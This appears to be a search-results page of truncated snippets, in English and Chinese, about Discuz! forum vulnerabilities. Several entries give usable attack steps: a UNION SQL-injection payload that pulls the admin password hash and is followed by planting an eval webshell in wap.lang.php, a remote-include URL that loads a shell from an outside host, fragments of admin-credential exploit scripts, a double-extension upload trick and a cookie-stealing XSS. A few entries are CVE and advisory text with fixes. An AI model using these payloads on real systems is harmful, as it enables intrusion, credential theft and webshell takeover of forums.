573 matches found
Discuz 5.0 0day + PM SMS bypass method-vulnerability warning-the black bar safety net
SQL: 0 union select password,2,0 from cdbmembers where uid=1/ uid=1/ 1 Is the ID value Obtain the Administrator's md5 password Into the background The forum management module edit details To modify the wap. php insert eval$POSTtlwbw Connection address Site address+/templates/default/wap.lang.php ...
Discuz! pm.php注入EXP
No description provided by source. htmlbr / headbr / meta http-equiv="Content-Type" content="text/html; charset=gb2312"br / titleDz 0day by Jackal/titlebr / SCRIPT LANGUAGE="JavaScript"br / !--br / function ReplaceDemotempbr / var r, re;br / re = /S+s+S+/g;br /...
Discuz[0day]remote include vulnerabilities-vulnerability warning-the black bar safety net
discuz Forum, the Trevi Fountain plug in the DZ root directory there is a wish. php file,file fourth line: require $discuzroot.'./ include/discuzcode.func.php'; Obviously the program does not do any filtering,a full remote include vulnerability,the specific use of the method is very simple:...
Discuz forum to blast the physical path principle-vulnerability warning-the black bar safety net
Affected version Discuz! 5.2 Discuz! 5.1 Discuz! 4.1 Discuz! 4.0 ............. 1. common. inc. php issues code 2 0, line 7 ..... $navtitle = $navigation = "; $extra = isset$extra && pregmatch"/^+$/i", $extra ? $extra : "; $tpp = intvalempty$DSESSION ? $topicperpage : $DSESSION; $ppp =...
Discuz论坛爆物理路径
当把变量当成数组提交时,如果不存在该数组,但存在变量,后面的pregmatch正则表达式匹配不了, 这样就出现了绝对路径的泄露 Discuz!5.2 Discuz!5.1 Discuz!4.1 Discuz!4.0 http://www.discuz.net/ 打开论坛 include 目录下的 common.inc.php $extra = isset$extra && pregmatch 改成 $extra = isset$extra && @pregmatch 1.common.inc.php问题代码207行 ..... $navtitle = $navigation = '';...
Discuz! 4.x SQL Injection / Admin Credentials Disclosure Exploit
Exploit for unknown platform in category web applications ================================================================ Discuz! 4.x SQL Injection / Admin Credentials Disclosure Exploit ================================================================ 126 $result.=" ."; else $result.="...
Discuz! 4.x - SQL Injection / Admin Credentials Disclosure
126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i; $cont++;if $cont==15 $cont=0; $result.="\r\n"; $exa.="\r\n"; return $exa."\r\n".$result; $proxyregex = '\b\d1,3.\d1,3.\d1,3.\d1,3:\d1,5\b'; function...
Discuz! 5.0.0 RC1 SQL injection PoC
No description provided by source. !c:\python24\pytonbr / Discuz! 5.0.0 RC1 SQL injection PoCbr / Author: wofeiwo thx superheis helpbr / Date: Aug 12th 2006br / br / import sysbr / import httplibbr / from urlparse import urlparsebr / from time import sleepbr / br / def...
Discuz 2.2F angle修改版存在安全漏洞
SaForums是angle基于Discuz 2.2F修改的论坛,过滤的比较严格,相对还是比较安全的。但是在APACHE中可以结合扩展名解释漏洞上传文件来获取WEBSHELL。 APACHE在解释扩展名的时候不是从文件名最后开始算,而是只要文件名中包含扩展名就会进行解释。例如aaa.php.rar会被当成php脚本来执行。 SaForums 修补方法: 去掉文件名中的"."字符: $filename = strreplace'.', '', $filename; SaForums默认是允许用户上传图片的,并且把上传的文件名进行一些处理: code in include\post.php...
Php5 GPC bypass flaw-vulnerability warning-the black bar safety net
In the discussion of specific defects before we start to learn a little about php security aspect of small things. magicquotesgpc option is php one of the important security settings, when the option is ON that is open at the time, all from GET, POST, COOKie is passed over the data in the'," and,...
CVE-2006-5561
SQL injection vulnerability in admincp.php in Discuz! GBK 5.0.0 allows remote attackers to execute arbitrary SQL commands via the cdbauth cookie...
CVE-2006-5561
The CVE refers to SQL injection in Discuz! GBK 5.0.0 via the cdb_auth cookie in admincp.php, enabling remote attackers to run arbitrary SQL commands. Affected software: Discuz! with GBK encoding, version 5.0.0. Root cause: unsafely parsed cookie value leads to SQL injection. Impact per sources: p...
Discuz! 5 SQL injection Exploit
No description provided by source. ?phpbr / printr'br / ---------------------------------------------------------------------------br / Discuz! 5.0.0 GBK SQL injection / admin credentials disclosure exploitbr / by rgod [email protected] / site: http://retrogod.altervista.orgbr / dorks: "powere...
discuz许愿池插件远程包含漏洞
许愿池插件的wish.php文件出的问题: require $discuzroot.'./include/discuzcode.func.php'; discuz bbs 目前客方已修正了此漏洞,请下载最新版本 手工利用方法: 远程包含漏洞,变量discuzroot过滤不严,利用方法: http://url/wish.php?discuzroot=http://www.neeao.com/xxxx.txt? 不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。 这里xxxx.txt用CN.Tink的那个小马写个shell进去:...
Discuz! 5.0.0 GBK SQL Injection / Admin Credentials Disclosure Exploit
Exploit for unknown platform in category web applications ====================================================================== Discuz! 5.0.0 GBK SQL Injection / Admin Credentials Disclosure Exploit ====================================================================== 126 $result.=" ."; else...
Discuz! 5.0.0 GBK - SQL Injection / Admin Credentials Disclosure
126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i; $cont++;if $cont==15 $cont=0; $result.="\r\n"; $exa.="\r\n"; return $exa."\r\n".$result; $proxyregex = '\b\d1,3.\d1,3.\d1,...
Discuz! 5.0.0 GBK - SQL Injection Admin Credentials Disclosure
Discuz! 5.0.0 GBK - SQL Injection Admin Credentials Disclosure 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i; $cont++;if $cont==15 $cont=0; $result.="\r\n"; $exa.="\r\n"; return $exa."\r\n".$result;...
Talking about the Discuz code hazard-vulnerability warning-the black bar safety net
In fact, this is also my posts unintentionally saw, as a forum owner, the management posts often depends on its content validity. For example, when a bias article provides a connection, we often will go to click it, but when we are the point of connection is not what we expect connection, we have...
Discuz! <= 4.0.0 rc4 Arbitrary File Upload Flaw
The remote host is using Discuz!, a popular web application forum in China. According to its version, the installation of Discuz! on the remote host fails to properly check for multiple extensions in uploaded files. An attacker may be able to exploit this issue to execute arbitrary commands on th...
PHP is a famous open source Forum: Discuz it! Cross-site Daquan-vulnerability warning-the black bar safety net
In the discuz! the The poster, back patch, PM, etc. of the subject are not filtered, so it can add the code. For example http://xxx/post.php?action=newthread&fid=2...cript%3E%3Cb%2 2 The effect is the first to pop your cookie Use method: put the above code placed into the img. Applicable version:...